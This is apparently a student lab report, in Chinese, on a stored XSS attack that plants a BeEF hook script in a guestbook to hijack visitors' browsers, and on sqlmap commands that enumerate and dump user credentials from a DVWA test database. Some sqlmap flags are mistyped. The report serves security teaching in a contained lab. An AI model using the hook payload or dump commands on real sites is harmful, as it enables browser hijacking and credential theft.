实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
实验原理:
XSS
1、什么是XSS
XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
2 、什么是XSS攻击
XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Java脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
首先把实验三文件夹的guestbook导入到win2003虚拟机,然后找到IIS(路径为 开始->程序->管理工具->IIS),找到默认网站,把文件夹给导入进去
在默认网站的主目录修改为D盘的文件GuestBook
接下来下载awvs,配置好实验环境后我们开始实验
一、xss跨站攻击
内容:利用Beef劫持被攻击者客户端浏览器。实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
输入ipconfig,查看ip地址,打开awvs进行扫描,发现其存在高危漏洞
1.利用AWVS扫描留言簿网站,发现存在xss漏洞
2.kali使用beef生成恶意代码
输入beef-xss
3.把代码写入留言簿网站首页
访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,
<script src="http://Kali的IP地址:3000/hook.js"></script>,截图
输入ifconfig查看kali的IP地址
将beef生成的恶意代码写入留言板中
我们查看是否留言成功
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
用物理机登录,发现成功被劫持
利用beef指定被劫持网站为学校主页
然后就会跳转到学校网页
5、回答问题:实验中XSS攻击属于哪种类型?
答:实验中的是存储型XXS攻击
SQL注入部分:DVWA+SQLmap+Mysql注入实战
实验环境搭建。启动Metasploitable2虚拟机。
SQL注入攻击
1、什么是SQL注入攻击
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。
2、为何会有SQL注入攻击
很多电子商务应用程序都使用数据库来存储信息。不论是产品信息,账目信息还是其它类型的数据,数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。
因为SQL查询经常用来进行验证、授权、订购、打印清单等,所以,允许攻击者任意提交SQL查询请求是非常危险的。通常,攻击者可以不经过授权,使用SQL输入从数据库中获取信息。
3. 何时使用SQL注入攻击
当Web应用向后端的数据库提交输入时,就可能遭到SQL注入攻击。可以将SQL命令人为的输入到URL、表格域,或者其他一些动态生成的SQL查询语句的输入参数中,完成上述攻击。因为大多数的Web应用程序都依赖于数据库的海量存储和相互间的逻辑关系(用户权限许可,设置等),所以,每次的查询中都会存在大量的参数。
kali上输入metasploitable的ip地址,dvwa帐号admin密码password
输入1,返回正常
输入1' 出现报错,说明被带入到数据库中了
可以判断存在sql注入漏洞
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
你输入的命令:dvwa的ip地址,cookie值从f12看出
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" --current-db
sqlmap截图如下:
数据库为:dvwa
然后输入以下指令,查询用户名:
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" --current-user
用户名:root@%
3、枚举数据库用户名和密码
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" -D dvwa -T --uers --password
4.枚举数据库
输入以下代码,查询当前数据库:
sqlmap -u "http://Metasplotiable2 的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=b6f8867949cdaf56aab38061b93b1447" -dbs
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" -dbs
5. 枚举数据库和指定数据库的数据表
输入以下指令:
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" -D dvwa --tables
6、获取指定数据库和表中所有列的信息
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" -D dvwa -T users --columns
7、枚举指定数据表中的所有用户名与密码,并down到本地。
sqlmap -u "http://192.168.65.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=30e42fcbb95498fed13496849c25bd5b" -D dvwa -T users -C user,password -dump
最后,关于sqlmap的语法参数,如下:
• -u :指定目标URL,即注入点
• --cookies:当前会话的cookies值
• -b:获取数据库类型,检索数据库管理系统标识
• --current-db:获取当前数据库
• --current-user:获取当前登录数据库使用的用户
• --users:枚举数据库用户名
• -password:枚举数据库用户的密码(hash)
• --dbs:枚举当前数据库
• -D:指定的数据库
• -T:指定数据库中的数据表
• --columns:获取列的信息
• -C:枚举数据表中的列
• --dump:存储数据表项
总结:这次渗透测试学习了XSS和SQL注入,很多不懂的东西上网百度,请教同学,老师学习,收获很多,永远保持积极的心态去学习新知识